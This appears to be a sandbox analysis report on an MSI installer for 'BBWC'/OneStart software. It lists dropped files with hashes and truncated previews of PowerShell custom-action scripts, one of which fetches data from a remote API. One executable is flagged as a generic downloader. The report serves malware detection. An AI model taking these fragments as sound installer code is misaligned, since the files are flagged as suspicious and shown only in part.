                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.).........#. .Y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.......$.l.s.p. .=. .".$.e.n.v.:.A.P.P.D.A.T.A./.O.n.e.S.t.a.r.t./.".....i.f.(.!.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.l.s.p. .).).{..... . . . .N.e.w.-.I.t.e.m. .-.I.t.e.m.T.y.p.e. .d.i.r.e.c.t.o.r.y. .-.P.a.t.h. .$.l.s.p.....}.....$.l.s.f.n. .=. .".i.n.t.e.r.m.e.d.i.a.t.e...d.a.t.".....$.l.s.f. .=. .".$.l.s.p./.$.l.s.f.n.".....i.f. .(.T.e.s.t.-.P.a.t.h. .$.l.s.f.). .....{..... . .R.e.m.o.v.e.-.I.t.e.m. .$.l.s.f.....}.....$.f.l.o.w.H.e.l.p.e.r.I.d. .=. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .F.H.N.....$.l.s.f. .=. .N.e.w.-.I.t.e.m. .-.P.a.t.h. .$.l.s.f. .-.I.t.e.m.T.y.p.e. .".f.i.l.e.". .-.V.a.l.u.e. .$.f.l.o.w.H.e.l.p.e.r.I.d.....
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.356273957008397
                      Encrypted:false
                      SSDEEP:
                      MD5:96C23A9121C507EB316A9343071BDFBF
                      SHA1:04B15BE640D45F36ED75601029B8F0395AE3535E
                      SHA-256:CEA354CECD3EFDF1635C0F4298FE5F8185C0C3AAC6C9820B26E32DE702FF268F
                      SHA-512:581D0F7DEDBCAF018F7D567C1689E80CE4DD49818A952D9C112C25451F8F518427258A8DCDA4511481999E72708181DB672A79686E28349EAD926AF6B315E442
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.A.3.C.F...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1650
                      Entropy (8bit):3.6141393589699744
                      Encrypted:false
                      SSDEEP:
                      MD5:2C31B152FEB1E7EB93FB722A1D74CE69
                      SHA1:5744809E9A63E2E5DF92B07F1C44E3B40C0B5A48
                      SHA-256:55D3C74653220AF13F8DB20084925C0DDE3A817A41257F6688DF17C571158B75
                      SHA-512:9631C366FC5FB82E586E12085AB9C96FBB5551AF837D39C20513216706C4510A99126FC36B073EE996FE27BCA0550FB6FA54EB1AA14086BFF99E0A277616F9CA
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.).........#. .Y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.......$.l.s.p. .=. .".$.e.n.v.:.L.O.C.A.L.A.P.P.D.A.T.A./.O.n.e.S.t.a.r.t...a.i./.".....i.f.(.!.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.l.s.p. .).).{..... . . . .N.e.w.-.I.t.e.m. .-.I.t.e.m.T.y.p.e. .d.i.r.e.c.t.o.r.y. .-.P.a.t.h. .$.l.s.p.....}.....$.l.s.p. .=. .".$.e.n.v.:.L.O.C.A.L.A.P.P.D.A.T.A./.O.n.e.S.t.a.r.t...a.i./.O.n.e.S.t.a.r.t.".....i.f.(.!.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.l.s.p. .).).{..... . . . .N.e.w.-.I.t.e.m. .-.I.t.e.m.T.y.p.e. .d.i.r.e.c.t.o.r.y. .-.P.a.t.h. .$.l.s.p.....}.....$.l.s.p. .=. .".$.e.n.v.:.L.O.C.A.L.A.P.P.D.A.T.A./.O.n.e.S.t.a.r.t...a.i./.O.n.e.S.t.a.r.t./.U.p.d.a.t.e.".....i.f.(.!.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.l.s.p. .).).{..... . . . .N.e.w.-.I.t.e.m. .-.I.t.e.m.T.y.p.e. .d.i.r.e.c.t.o.r.y. .-.P.a.t.h. .$.l.s.p.....}.....$.l.s.f.n. .=. .".i.n.t.e.r.m.e.d.i.a.t.e...d.a.t.".....$.l.s.f. .=. .
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5642
                      Entropy (8bit):2.3574264080577967
                      Encrypted:false
                      SSDEEP:
                      MD5:F2458DD86096F1C600CEC7F5FFC882ED
                      SHA1:46AF6FB958340936DA6FD0587FEFE4FEEF1F49B2
                      SHA-256:4221E49EB3860A1A7EFE583E1C246DF29B414918E11D6C0576593369A9C1918F
                      SHA-512:851315EFE6B6FCEA3A483C10C4C011B9E532CF519C62E2D74ED8D6666F88BD7D63241876899E8827808E711A865657C941A7D87F6979BA1E22FFE54E46AFFFC4
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.B.4.E.A...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):2222
                      Entropy (8bit):3.6358738026260666
                      Encrypted:false
                      SSDEEP:
                      MD5:EB1A87309734AE67580AAD5EED063B67
                      SHA1:4CDFC9A7720B21DF4D20F95BE269D364B5DC033B
                      SHA-256:C0369FC871EA7D4DA4609FB72DBB635BAB035476C6BFF9595E2951B2C4AB69CC
                      SHA-512:6537161CE1EEC201A9DF3A4CC353F453DF339130DDA89463DADA1C2C76E7C4F09374ACE5998A2F6E2FA4C17F61C385B1CA3FE6A43AA1DD0CD3CC71559CA3364E
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.$.v.e.r.s.i.o.n.).........#. .Y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.......f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.T.o.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.r..... . . . .r.e.t.u.r.n. .$.p.s._.j.s...S.e.r.i.a.l.i.z.e.(.$.i.t.e.m.).....}.........f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.F.r.o.m.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{. ..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.r......... . . . .#.T.h.e. .c.o.m.m.a. .o.p.e.r.a.t.o.r. .i.s. .t.h.e. .a.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5692
                      Entropy (8bit):2.378718927875605
                      Encrypted:false
                      SSDEEP:
                      MD5:CAB1D6F1344B6CB51ADD04F612AA1965
                      SHA1:4FD358DED9CBED52E54174647367C9A124DC8741
                      SHA-256:A02F1DA65F59B9F7BEC674437A450E669D37C1EB4A5508F52710EA84BABD0FFF
                      SHA-512:BEFDA836C342BFB069DC531F0B99EFF7607E5D4792074AC0278584FDF1C0ECFF9C194375755017EE0183D8AFE4F8BFFBBED115AE581B1472BAA46EB1804E80EC
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.C.2.E.B...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1878
                      Entropy (8bit):3.6357593713249186
                      Encrypted:false
                      SSDEEP:
                      MD5:40F4F724022CCF94946155CE0E74D9EE
                      SHA1:C9A1785771A850B86FBCAAF5EE34104F5F965914
                      SHA-256:B7CF422B7B3A62F7A54B8831EDD980B52D59174DF539BCC1FEB2D19206141198
                      SHA-512:A48DE7AC4748ED288B1A95C2DBDC837035D677250BB89D3980B9CCA89C98B67D480A12F544E5AB337DEA7F80053113B00D639F2CC53EEA8310D54AC2FA8C0D46
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.$.d.o.m.a.i.n.,. .$.v.e.r.s.i.o.n.,. .$.a.p.p.N.a.m.e.,. .$.f.i.d.).....#. .Y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.......f.u.n.c.t.i.o.n. .C.o.n.v.e.r.t.T.o.-.J.s.o.n.2.0.(.[.o.b.j.e.c.t.]. .$.i.t.e.m.).{..... . . . .a.d.d.-.t.y.p.e. .-.a.s.s.e.m.b.l.y. .s.y.s.t.e.m...w.e.b...e.x.t.e.n.s.i.o.n.s..... . . . .$.p.s._.j.s.=.n.e.w.-.o.b.j.e.c.t. .s.y.s.t.e.m...w.e.b...s.c.r.i.p.t...s.e.r.i.a.l.i.z.a.t.i.o.n...j.a.v.a.s.c.r.i.p.t.S.e.r.i.a.l.i.z.e.r..... . . . .r.e.t.u.r.n. .$.p.s._.j.s...S.e.r.i.a.l.i.z.e.(.$.i.t.e.m.).....}.....f.u.n.c.t.i.o.n. .C.h.e.c.k.I.n.s.t.a.l.l.e.d.....{.......$.r.e.t. .=. .'.0.'..... . . . .T.r.y.{..... . . . . . . . .$.r.e.t. .=. .G.e.t.-.I.t.e.m.P.r.o.p.e.r.t.y.V.a.l.u.e. .-.P.a.t.h. .".H.K.C.U.:.\.S.O.F.T.W.A.R.E.\.O.n.e.S.t.a.r.t...a.i.\.O.n.e.S.t.a.r.t. .S.o.f.t.w.a.r.e.". .-.N.a.m.e. .".V.e.r.s.i.o.n.". . . . . . . ..... . . . .}..... . . . .C.a.t.c.h.{.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5782
                      Entropy (8bit):2.4074965823690704
                      Encrypted:false
                      SSDEEP:
                      MD5:7490B8AE2B0C6FFBE16D7A4F0FD02C9B
                      SHA1:ED1F0B619449C34A23829B63CAE35B57258339B4
                      SHA-256:97650D0AF58E6DF61A0E8E4EF0201F5592DAC23430E81EE01AC98D568C1BEBD2
                      SHA-512:C98908E4C971A6F64DE4B3739BFAD342A677103753254E790078958677B9C5F5E68AE668A36833149B3696E885C0B2254BEBC349F0596D7C60DA697D5254774A
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.C.7.E.9...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5682
                      Entropy (8bit):2.3744496388990632
                      Encrypted:false
                      SSDEEP:
                      MD5:1DAF1E129E850B56B5F0AE5312949EDE
                      SHA1:1A24DAD392BB114FC2D1CAC35CC467AFD55D36BB
                      SHA-256:F297A729A5B91B080260C6541867FAF91C9D58855F973553EFD6302A7FCAEF54
                      SHA-512:31888376EA8EB3A0139C6870EB69083E7D415E83A8598D8D056D38BAD2246C0F6055BA522EE44436663A1A130F8901BC73A47A59C873DD4568AF91CCF4A801FF
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.D.F.B.6...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):846
                      Entropy (8bit):3.61636013833285
                      Encrypted:false
                      SSDEEP:
                      MD5:E945E427989079DE85CB6825100B7925
                      SHA1:15CFD7A1499097475123EFEFF20FFC68A0BFB309
                      SHA-256:81D4021180BB62D1FE7325060A79C48FBEADC4C7CEED12BB561A2EE9D50EBC03
                      SHA-512:4B7BB1AFAB16953F95B12911D060018C64766F87C7D4752F58C783A17C0970251EC951C8A0390D6E5E5DEDB4ECAD57F249387198AFC788CB6973DED06A5F7043
                      Malicious:false
                      Reputation:low
                      Preview:..#. .B.l.o.c.k. .f.o.r. .d.e.c.l.a.r.i.n.g. .t.h.e. .s.c.r.i.p.t. .p.a.r.a.m.e.t.e.r.s.......P.a.r.a.m.(.$.d.o.m.a.i.n.).........#. .Y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.......$.f.l.o.w.H.e.l.p.e.r.I.d. .=. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .F.H.N.........$.u.r.l. .=. .".h.t.t.p.s.:././.$.d.o.m.a.i.n./.a.p.i./.g.m.s.i.p.t.?.f.h.n.i.d.=.$.f.l.o.w.H.e.l.p.e.r.I.d.".....$.w.e.b. .=. .N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.....$.r.e.s.p.o.n.s.e. .=. .$.w.e.b...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.$.u.r.l.).....$.j.s.o.n. .=. .C.o.n.v.e.r.t.F.r.o.m.-.J.s.o.n. .$.r.e.s.p.o.n.s.e.....$.p.r.o.d.u.c.t. .=. .$.j.s.o.n...P.r.o.d.u.c.t.....i.f. .(.$.p.r.o.d.u.c.t. .-.n.e. .$.n.u.l.l. .-.a.n.d. .$.p.r.o.d.u.c.t. .-.n.e. .".".). .{.......A.I._.S.e.t.M.s.i.P.r.o.p.e.r.t.y. .P.R.O.D.U.C.T._.T.Y.P.E. .$.p.r.o.d.u.c.t.....}.........
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5682
                      Entropy (8bit):2.3741567221500453
                      Encrypted:false
                      SSDEEP:
                      MD5:1702201E14011FEBDD2EC11C7930FC02
                      SHA1:806BD623C35DA8DE76D197F98DE5F99A90730EE5
                      SHA-256:63DBC68BE2725B241168D7ECE8D1D58CE1AB338874102AC5907EE1E778AFF524
                      SHA-512:7819FB22CE7C10716791D32E4B9725960C1D302D3AE154A7B0405CCAC55AECD1ED490B29282CA0AFB41C69CE474E115AF606A7E281F5D3143248F413E6A19A1E
                      Malicious:false
                      Reputation:low
                      Preview:..t.r.y. .{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . .$._.m.s.i.P.r.o.p.O.u.t.F.i.l.e. .=. .'.C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.s.i.E.3.9.3...t.m.p...t.x.t.'. . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$._.i.s.T.e.s.t. .=. .$.f.a.l.s.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . .....F.u.n.c.t.i.o.n. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y.(.[.s.t.r.i.n.g.]. .$.n.a.m.e. .=. .$.(.t.h.r.o.w. .'.A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .r.e.q.u.i.r.e.s. .p.r.o.p.e.r.t.y. .n.a.m.e.'.).,. ..... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .$.t.e.s.t.V.a.l.u.e. .=. .$.n.u.l.l.). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . .i.f.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                      Category:dropped
                      Size (bytes):118877
                      Entropy (8bit):5.455618596473384
                      Encrypted:false
                      SSDEEP:
                      MD5:ADB96146B25696687F9B8D56B4E2BA4B
                      SHA1:88892D8F897701C321D052DBD6FCED766EABF4FF
                      SHA-256:F5B87A47916624FA89A0B2A2E9B4F0FD0910D83EB1AF8894AE29315D20BB3D45
                      SHA-512:1C160EA3ED77B01627F396C09F611026B649E825B1FE6FB3B452E22BCA360DFD470F5A67D08FDC3D598E690C9393491E3DEC363019D7B348A7A20BA6E5ED782A
                      Malicious:false
                      Reputation:low
                      Preview:............ ..J..f......... .(...UK..@@.... .(B..}S..00.... ..%...... .... .....M......... .h........PNG........IHDR.............\r.f..J.IDATx..w..W......=y$MP.EK.eY.l...q...l..>.....v.............]va...5N`.q...K..5..f49t.:...G..=.=.=......U}....{..........(.A...P.F...(....A...F.c.q.....:... ..P.P(.x.. p..e;..).3...5.K...s...8..b`.R,...T....('.P.P..F...d..d-.....J........q..S(v....)E....}.....,mRc..".m.5K.j=..X..<P.....(..U.7(7`..78.z..1.v.. e9u....Q.A..R....}(..z.x...s...G...ml.P0............g.ni..^.T)T.P..........FWL. ]=.(.A.....p..~..............Gl.0.x...h..G........C.w....e........4....).....8.t.:...o.j.N,y.'.B....-..w.T...s....X\5<.._.*t.....'..D.1.........t.....8....A....uxq...&..[....^..V.k.5.y...2..,j....G.w?.H....gX2f,?o........j..[..8...........5.....=...@3..../E.+...7Z.HHCw.y../......t.km..HW.........P.8.#@|.....=.3.....=......{.....c|....x\.vtX.<.l...=...5.g.....A..x..S(.)T.0...C....y.-.....r.U.B.....W..AJ\...8v...G.....i..-.....
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {FB0F6D6B-777A-47FB-B2CD-784D1A44D33C}, Number of Words: 10, Subject: BBWC, Author: Eclipse Media Inc, Name of Creating Application: Advanced Installer 15.8 build b14c769f44, Template: ;1033, Comments: This installer database contains the logic and data required to install BBWC., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                      Category:dropped
                      Size (bytes):3166720
                      Entropy (8bit):7.514304440050324
                      Encrypted:false
                      SSDEEP:
                      MD5:3926AC99ED98C0367AC25CC96CE0C7CE
                      SHA1:CCCE41DB9D5EAE6005FCE84A31C2D62A43773DC1
                      SHA-256:14104926AD4E113543F30F66A24316815F8246E8DFCE3464FF0867EF9BEBD039
                      SHA-512:0BC356CE1A9B5B8AD2D091B27B56630772FE345AE683A5FA1563557B7A2F792B977F311A19B6ADB1E4BE169688B1DDBCF8385BFBC31F487D3BB1B1D6182F9003
                      Malicious:false
                      Reputation:low
                      Preview:......................>...................1...................................}...............................................r...s...t...u...v...w...x...y...z...{...........Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...............................................................................................................................................................................................................................................................d...............3...&........................................................................................... ...!..."...#...$...%...0...2...(...)...*...+...,...-......./.......1...4...8...D...5...6...7...:...9...A...;...<...=...>...?...@...v...B...C...I...E...F...G...H.......J...c...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b.......e...v...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...w...k...x...y...z...
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3613200
                      Entropy (8bit):6.5993827304514445
                      Encrypted:false
                      SSDEEP:
                      MD5:099B950C7CA279C7E643EE04C7E0CDAE
                      SHA1:BAEC19AC53CC1EB2A7E20EC4A9D9CC20699FCB93
                      SHA-256:9235B6F273F307E95E804ECA1DFF08561088BB07B35CACF4181F5ED04D674542
                      SHA-512:36722D9D0EAA4290C8FFC1DDA536AE24D9C085DC3A0AF50B4AC1125ED9F7C34FBD37E1EBF37AC66C8E401AECE027905D382C4353934D7F64D193800315D00FDA
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe, Author: Joe Security
                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe, Author: Joe Security
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      • Antivirus: Virustotal, Detection: 0%, Browse
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4.d..................5..........25.. ........@.. .......................`7.....kB7...`..................................25.W....@5...............6..&...@7......25.............................................. ............... ..H............text.....5.. ....5................. ..`.rsrc........@5.......5.............@..@.reloc.......@7.......6.............@..B.................25.....H........J0. ...............P0,..........................................0...........%(.....}......}....*....0...........{....*..0...........{....*..(....*..0.......... 9.............Hh 9..;..........Hh..E.................+. ...f..........Hh&+. .............Hh+.. ...1.........Hh+. ...[.........Hh+.,. ..W..........Hh9.....{....*....0.......... d.K_.........Hh d............Hh..E.................+. ..............Hh&+. ..rr...........Hh+.. ..b2.........Hh+. ...S.........Hh+.,. ..
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):19529
                      Entropy (8bit):4.992843947559373
                      Encrypted:false
                      SSDEEP:
                      MD5:F869E620CB7BC2732B0A90B176A3FCE7
                      SHA1:50EDB9EFAC975575055A7FDFF73E0AC01C8BA83D
                      SHA-256:EBCAAEA158E4CF2980415BCC7516CDE8E27BDC2497F349531E839E9F8D1699A3
                      SHA-512:AABF0D50150303AA0F140804CCD02F14B5577BAAFF0BFC9C2886F36A9885C865E10D8B51DBC9F8E5A400A2F921E1178F56A76084145EA90B0AB77AEF67BBF66D
                      Malicious:false
                      Reputation:low
